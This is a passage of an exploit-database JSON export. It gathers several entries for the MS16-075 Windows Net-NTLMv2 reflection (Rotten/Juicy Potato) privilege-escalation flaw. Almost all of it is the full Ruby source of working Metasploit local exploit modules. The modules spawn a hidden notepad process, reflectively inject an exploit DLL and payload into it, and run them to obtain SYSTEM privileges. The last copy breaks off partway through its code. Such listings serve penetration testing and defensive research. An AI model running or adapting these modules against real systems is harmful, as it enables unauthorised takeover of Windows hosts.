Tags: Metasploit Framework (MSF), Local", "published": "2018-10-08T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2018-10-08T00:00:00", "id": "EDB-ID:45562", "href": "https://www.exploit-db.com/exploits/45562/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',\r\n 'Description' => %q(\r\n Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\r\n to achieve a SYSTEM handle for elevation of privilege. 
Currently the module\r\n does not spawn as SYSTEM, however once achieving a shell, one can easily\r\n use incognito to impersonate the token.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'FoxGloveSec', # the original Potato exploit\r\n 'breenmachine', # Rotten Potato NG!\r\n 'Mumbai' # Austin : port of RottenPotato for reflection & quick module\r\n ],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => ['meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'none',\r\n 'WfsDelay' => '20'\r\n },\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows x86', { 'Arch' => ARCH_X86 }],\r\n ['Windows x64', { 'Arch' => ARCH_X64 }]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'References' =>\r\n [\r\n ['MSB', 'MS16-075'],\r\n ['CVE', '2016-3225'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\r\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\r\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG']\r\n ],\r\n 'DisclosureDate' => 'Jan 16 2016',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def assign_target\r\n if target.name == 'Automatic'\r\n case sysinfo[\"Architecture\"]\r\n when 'x86'\r\n vprint_status(\"Found we are on an x86 target\")\r\n my_target = targets[1]\r\n when 'x64'\r\n vprint_status(\"Found we are on an x64 target\")\r\n my_target = targets[2]\r\n else\r\n fail_with(Failure::NoTarget, \"Unable to determine target\")\r\n end\r\n else\r\n my_target = target\r\n end\r\n return my_target\r\n end\r\n\r\n def verify_arch(my_target)\r\n if my_target[\"Arch\"] != sysinfo[\"Architecture\"]\r\n print_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\")\r\n print_error(\"Actual Target Arch = #{sysinfo['Architecture']}\")\r\n fail_with(Failure::BadConfig, \"Assigned Arch does not match reality\")\r\n 
end\r\n if client.arch != sysinfo[\"Architecture\"]\r\n fail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not supported\")\r\n else\r\n vprint_good(\"Current payload and target Arch match....\")\r\n end\r\n end\r\n\r\n def check\r\n privs = client.sys.config.getprivs\r\n if privs.include?('SeImpersonatePrivilege')\r\n return Exploit::CheckCode::Appears\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n my_target = assign_target\r\n print_status(\"#{my_target['Arch']}\")\r\n verify_arch(my_target)\r\n if check == Exploit::CheckCode::Safe\r\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')\r\n end\r\n if my_target.opts['Arch'] == 'x64'\r\n dll_file_name = 'rottenpotato.x64.dll'\r\n vprint_status(\"Assigning payload rottenpotato.x64.dll\")\r\n elsif my_target.opts['Arch'] == 'x86'\r\n dll_file_name = 'rottenpotato.x86.dll'\r\n vprint_status(\"Assigning payload rottenpotato.x86.dll\")\r\n else\r\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\r\n end\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Meterpreter::RequestError\r\n print_error('Operation failed. 
Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45562/"}], "metasploit": [{"lastseen": "2020-10-07T21:29:36", "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string. 
Windows 10 after version 1803, (April 2018 update, build 17134) and all versions of Windows Server 2019 are not vulnerable.\n", "published": "2019-01-10T16:20:43", "type": "metasploit", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION_JUICY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info = {})\n super(update_info(info, {\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)',\n 'Description' => %q(\n This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege.\n It requires a CLSID string.\n Windows 10 after version 1803, (April 2018 update, build 17134) and all\n versions of Windows Server 2019 are not vulnerable.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'FoxGloveSec', # the original Potato exploit\n 'breenmachine', # Rotten Potato NG!\n 'decoder', # Lonely / Juicy Potato\n 'ohpe', # Juicy Potato\n 'phra', # MSF Module\n 'lupman' # MSF Module\n ],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'none',\n 'WfsDelay' => '20'\n },\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['MSB', 'MS16-075'],\n ['CVE', '2016-3225'],\n ['URL', 
'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG'],\n ['URL', 'https://decoder.cloud/2017/12/23/the-lonely-potato/'],\n ['URL', 'https://ohpe.it/juicy-potato/']\n ],\n 'DisclosureDate' => '2016-01-16',\n 'DefaultTarget' => 0\n }))\n\n register_options(\n [\n OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ])\n ]\n )\n\n register_advanced_options(\n [\n OptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]),\n OptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]),\n OptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]),\n OptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]),\n OptString.new('LogFile', [ false, 'Set the log file' ])\n ]\n )\n end\n\n # Creates a temp notepad.exe to inject payload in to given the payload\n def create_temp_proc\n windir = client.sys.config.getenv('windir')\n # Select path of executable to run depending the architecture\n if sysinfo[\"Architecture\"] == ARCH_X64 && client.arch == ARCH_X86 && @payload_arch.first == ARCH_X64\n cmd = \"#{windir}\\\\Sysnative\\\\notepad.exe\"\n elsif sysinfo[\"Architecture\"] == ARCH_X64 && client.arch == ARCH_X64 && @payload_arch.first == ARCH_X86\n cmd = \"#{windir}\\\\SysWOW64\\\\notepad.exe\"\n else\n cmd = \"#{windir}\\\\System32\\\\notepad.exe\"\n end\n begin\n proc = client.sys.process.execute(cmd, nil, { 'Hidden' => true })\n rescue Rex::Post::Meterpreter::RequestError\n return nil\n end\n\n return proc\n end\n\n def create_temp_proc_stage2\n windir = client.sys.config.getenv('windir')\n # Select path of executable to run depending 
the architecture\n if sysinfo[\"Architecture\"] == ARCH_X64 && @payload_arch.first == ARCH_X86\n cmd = \"#{windir}\\\\SysWOW64\\\\notepad.exe\"\n else\n cmd = \"#{windir}\\\\System32\\\\notepad.exe\"\n end\n return cmd\n end\n\n def check\n os = client.sys.config.sysinfo['OS']\n build = os.match(/Build (\\d+)/)\n privs = client.sys.config.getprivs\n # Fast fails\n if !privs.include?('SeImpersonatePrivilege')\n print_bad(\"Target session is missing the SeImpersonatePrivilege.\")\n return Exploit::CheckCode::Safe\n end\n if (os =~ /NT|XP|2003|.NET Server/) || (os =~ /2008/ && os !~ /2008 R2/)\n print_bad(\"Microsoft Windows before Server 2008 R2 are not vulnerable.\")\n return Exploit::CheckCode::Safe\n end\n # Windows 10 after build 17134 (April 2018 update, version 1803) is not\n # vulnerable. Due to changes in OS names, detecting the difference between\n # Server 2016/19 is most reliably done with build numbers:\n # (https://github.com/rapid7/metasploit-payloads/pull/355)\n if build.nil?\n print_warning(\"Could not determine Windows build number - exploiting might fail.\")\n else\n build_number = build[1].to_i\n if build_number > 17134\n print_bad(\"Target appears to be patched (#{os})\")\n return Exploit::CheckCode::Safe\n elsif build_number < 7601\n print_bad(\"Target appears to be too old (#{os})\")\n return Exploit::CheckCode::Safe\n end\n end\n print_good(\"Target appears to be vulnerable (#{os})\")\n return Exploit::CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n @payload_name = datastore['PAYLOAD']\n @payload_arch = framework.payloads.create(@payload_name).arch\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')\n end\n if @payload_arch.first == ARCH_X64\n dll_file_name = 'juicypotato.x64.dll'\n vprint_status(\"Assigning payload juicypotato.x64.dll\")\n elsif @payload_arch.first == ARCH_X86\n 
dll_file_name = 'juicypotato.x86.dll'\n vprint_status(\"Assigning payload juicypotato.x86.dll\")\n else\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\n end\n print_status('Launching notepad to host the exploit...')\n notepad_process = create_temp_proc\n cmd = create_temp_proc_stage2\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"juicypotato\", dll_file_name)\n library_path = ::File.expand_path(library_path)\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n print_status(\"Exploit injected. Injecting exploit configuration into #{process.pid}...\")\n configuration = \"#{datastore['LogFile']}\\x00\"\n configuration += \"#{cmd}\\x00\"\n configuration += \"#{datastore['CLSID']}\\x00\"\n configuration += \"#{datastore['ListeningPort']}\\x00\"\n configuration += \"#{datastore['RpcServerHost']}\\x00\"\n configuration += \"#{datastore['RpcServerPort']}\\x00\"\n configuration += \"#{datastore['ListeningAddress']}\\x00\"\n configuration += \"#{payload.encoded.length}\\x00\"\n configuration += payload.encoded\n payload_mem = inject_into_process(process, configuration)\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Configuration injected. 
Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms16_075_reflection_juicy.rb"}, {"lastseen": "2020-10-14T21:43:02", "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.\n", "published": "2018-08-03T06:09:24", "type": "metasploit", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',\n 'Description' => %q(\n Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. 
Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'FoxGloveSec', # the original Potato exploit\n 'breenmachine', # Rotten Potato NG!\n 'Mumbai' # Austin : port of RottenPotato for reflection & quick module\n ],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'none',\n 'WfsDelay' => '20'\n },\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Windows x86', { 'Arch' => ARCH_X86 }],\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['MSB', 'MS16-075'],\n ['CVE', '2016-3225'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG']\n ],\n 'DisclosureDate' => '2016-01-16',\n 'DefaultTarget' => 0\n }))\n end\n\n def assign_target\n if target.name == 'Automatic'\n case sysinfo[\"Architecture\"]\n when 'x86'\n vprint_status(\"Found we are on an x86 target\")\n my_target = targets[1]\n when 'x64'\n vprint_status(\"Found we are on an x64 target\")\n my_target = targets[2]\n else\n fail_with(Failure::NoTarget, \"Unable to determine target\")\n end\n else\n my_target = target\n end\n return my_target\n end\n\n def verify_arch(my_target)\n if my_target[\"Arch\"] != sysinfo[\"Architecture\"]\n print_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\")\n print_error(\"Actual Target Arch = #{sysinfo['Architecture']}\")\n fail_with(Failure::BadConfig, \"Assigned Arch does not match reality\")\n end\n if client.arch != sysinfo[\"Architecture\"]\n fail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not 
supported\")\n else\n vprint_good(\"Current payload and target Arch match....\")\n end\n end\n\n def check\n privs = client.sys.config.getprivs\n if privs.include?('SeImpersonatePrivilege')\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n my_target = assign_target\n print_status(\"#{my_target['Arch']}\")\n verify_arch(my_target)\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')\n end\n if my_target.opts['Arch'] == 'x64'\n dll_file_name = 'rottenpotato.x64.dll'\n vprint_status(\"Assigning payload rottenpotato.x64.dll\")\n elsif my_target.opts['Arch'] == 'x86'\n dll_file_name = 'rottenpotato.x86.dll'\n vprint_status(\"Assigning payload rottenpotato.x86.dll\")\n else\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\n end\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name)\n library_path = ::File.expand_path(library_path)\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n print_status(\"Exploit injected. 
Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms16_075_reflection.rb"}], "packetstorm": [{"lastseen": "2019-01-16T18:50:49", "description": "", "published": "2019-01-16T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Net-NTLMv2 Reflection DCOM/RPC Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2019-01-16T00:00:00", "id": "PACKETSTORM:151182", "href": "https://packetstormsecurity.com/files/151182/Microsoft-Windows-Net-NTLMv2-Reflection-DCOM-RPC-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/windows/reflective_dll_injection' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)', \n'Description' => %q( \nThis module utilizes the Net-NTLMv2 reflection between DCOM/RPC \nto achieve a SYSTEM handle for elevation of privilege. \nIt requires a CLSID string. 
\n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'FoxGloveSec', # the original Potato exploit \n'breenmachine', # Rotten Potato NG! \n'decoder', # Lonely / Juicy Potato \n'ohpe', # Juicy Potato \n'phra', # MSF Module \n'lupman' # MSF Module \n], \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'none', \n'WfsDelay' => '20' \n}, \n'Targets' => \n[ \n['Automatic', {}] \n#['Windows x86', { 'Arch' => ARCH_X86 }], \n#['Windows x64', { 'Arch' => ARCH_X64 }] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n['MSB', 'MS16-075'], \n['CVE', '2016-3225'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], \n['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], \n['URL', 'https://github.com/breenmachine/RottenPotatoNG'], \n['URL', 'https://decoder.cloud/2017/12/23/the-lonely-potato/'], \n['URL', 'https://ohpe.it/juicy-potato/'] \n], \n'DisclosureDate' => 'Jan 16 2016', \n'DefaultTarget' => 0 \n})) \n \nregister_options( \n[ \nOptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ]) \n]) \n \nregister_advanced_options( \n[ \nOptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]), \nOptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]), \nOptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]), \nOptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]), \nOptString.new('LogFile', [ false, 'Set the log file' ]) \n]) \nend \n \ndef assign_target \nif target.name == 'Automatic' \ncase sysinfo[\"Architecture\"] \nwhen 'x86' \nvprint_status(\"Found we are on an x86 target\") \nmy_target = targets[1] \nwhen 'x64' 
\nvprint_status(\"Found we are on an x64 target\") \nmy_target = targets[2] \nelse \nfail_with(Failure::NoTarget, \"Unable to determine target\") \nend \nelse \nmy_target = target \nend \nreturn my_target \nend \n \n# Creates a temp notepad.exe to inject payload in to given the payload \ndef create_temp_proc() \nwindir = client.sys.config.getenv('windir') \n# Select path of executable to run depending the architecture \nif sysinfo[\"Architecture\"] == ARCH_X64 and client.arch == ARCH_X86 and @payload_arch.first == ARCH_X64 \ncmd = \"#{windir}\\\\Sysnative\\\\notepad.exe\" \nelsif sysinfo[\"Architecture\"] == ARCH_X64 and client.arch == ARCH_X64 and @payload_arch.first == ARCH_X86 \ncmd = \"#{windir}\\\\SysWOW64\\\\notepad.exe\" \nelse \ncmd = \"#{windir}\\\\System32\\\\notepad.exe\" \nend \nbegin \nproc = client.sys.process.execute(cmd, nil, {'Hidden' => true}) \nrescue Rex::Post::Meterpreter::RequestError \nreturn nil \nend \n \nreturn proc \nend \n \ndef create_temp_proc_stage2() \nwindir = client.sys.config.getenv('windir') \n# Select path of executable to run depending the architecture \nif sysinfo[\"Architecture\"] == ARCH_X64 and @payload_arch.first == ARCH_X86 \ncmd = \"#{windir}\\\\SysWOW64\\\\notepad.exe\" \nelse \ncmd = \"#{windir}\\\\System32\\\\notepad.exe\" \nend \nreturn cmd \nend \n \ndef check \nprivs = client.sys.config.getprivs \nwin10build = client.sys.config.sysinfo['OS'].match /Windows 10 \\(Build (\\d+)\\)/ \nif win10build and win10build[1] > '17134' \nreturn Exploit::CheckCode::Safe \nend \nwin2019build = client.sys.config.sysinfo['OS'].match /Windows 2019 \\(Build (\\d+)\\)/ \nif win2019build and win2019build[1] > '17134' \nreturn Exploit::CheckCode::Safe \nend \nif privs.include?('SeImpersonatePrivilege') \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nif is_system? 
\nfail_with(Failure::None, 'Session is already elevated') \nend \n@payload_name = datastore['PAYLOAD'] \n@payload_arch = framework.payloads.create(@payload_name).arch \nmy_target = assign_target \nif check == Exploit::CheckCode::Safe \nfail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege') \nend \nif @payload_arch.first == ARCH_X64 \ndll_file_name = 'juicypotato.x64.dll' \nvprint_status(\"Assigning payload juicypotato.x64.dll\") \nelsif @payload_arch.first == ARCH_X86 \ndll_file_name = 'juicypotato.x86.dll' \nvprint_status(\"Assigning payload juicypotato.x86.dll\") \nelse \nfail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\") \nend \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = create_temp_proc \ncmd = create_temp_proc_stage2 \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nlibrary_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"juicypotato\", dll_file_name) \nlibrary_path = ::File.expand_path(library_path) \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \nprint_status(\"Exploit injected. 
Injecting exploit configuration into #{process.pid}...\") \nconfiguration = \"#{datastore['LogFile']}\\x00\" \nconfiguration += \"#{cmd}\\x00\" \nconfiguration += \"#{datastore['CLSID']}\\x00\" \nconfiguration += \"#{datastore['ListeningPort']}\\x00\" \nconfiguration += \"#{datastore['RpcServerHost']}\\x00\" \nconfiguration += \"#{datastore['RpcServerPort']}\\x00\" \nconfiguration += \"#{datastore['ListeningAddress']}\\x00\" \nconfiguration += \"#{payload.encoded.length}\\x00\" \nconfiguration += payload.encoded \npayload_mem = inject_into_process(process, configuration) \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Configuration injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151182/ms16_075_reflection_juicy.rb.txt"}, {"lastseen": "2018-10-06T10:13:05", "description": "", "published": "2018-10-05T00:00:00", "type": "packetstorm", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4113", "CVE-2016-3225"], "modified": "2018-10-05T00:00:00", "id": "PACKETSTORM:149689", "href": "https://packetstormsecurity.com/files/149689/Windows-Net-NTLMv2-Reflection-DCOM-RPC.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/windows/reflective_dll_injection' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::FileInfo \ninclude 
Msf::Post::Windows::ReflectiveDLLInjection \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC', \n'Description' => %q( \nModule utilizes the Net-NTLMv2 reflection between DCOM/RPC \nto achieve a SYSTEM handle for elevation of privilege. Currently the module \ndoes not spawn as SYSTEM, however once achieving a shell, one can easily \nuse incognito to impersonate the token. \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'FoxGloveSec', # the original Potato exploit \n'breenmachine', # Rotten Potato NG! \n'Mumbai' # Austin : port of RottenPotato for reflection & quick module \n], \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'none', \n'WfsDelay' => '20' \n}, \n'Targets' => \n[ \n['Automatic', {}], \n['Windows x86', { 'Arch' => ARCH_X86 }], \n['Windows x64', { 'Arch' => ARCH_X64 }] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n['MSB', 'MS16-075'], \n['CVE', '2016-3225'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], \n['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], \n['URL', 'https://github.com/breenmachine/RottenPotatoNG'] \n], \n'DisclosureDate' => 'Jan 16 2016', \n'DefaultTarget' => 0 \n})) \nend \n \ndef assign_target \nif target.name == 'Automatic' \ncase sysinfo[\"Architecture\"] \nwhen 'x86' \nvprint_status(\"Found we are on an x86 target\") \nmy_target = targets[1] \nwhen 'x64' \nvprint_status(\"Found we are on an x64 target\") \nmy_target = targets[2] \nelse \nfail_with(Failure::NoTarget, \"Unable to determine target\") \nend \nelse \nmy_target = target \nend \nreturn my_target \nend \n \ndef verify_arch(my_target) \nif my_target[\"Arch\"] != sysinfo[\"Architecture\"] 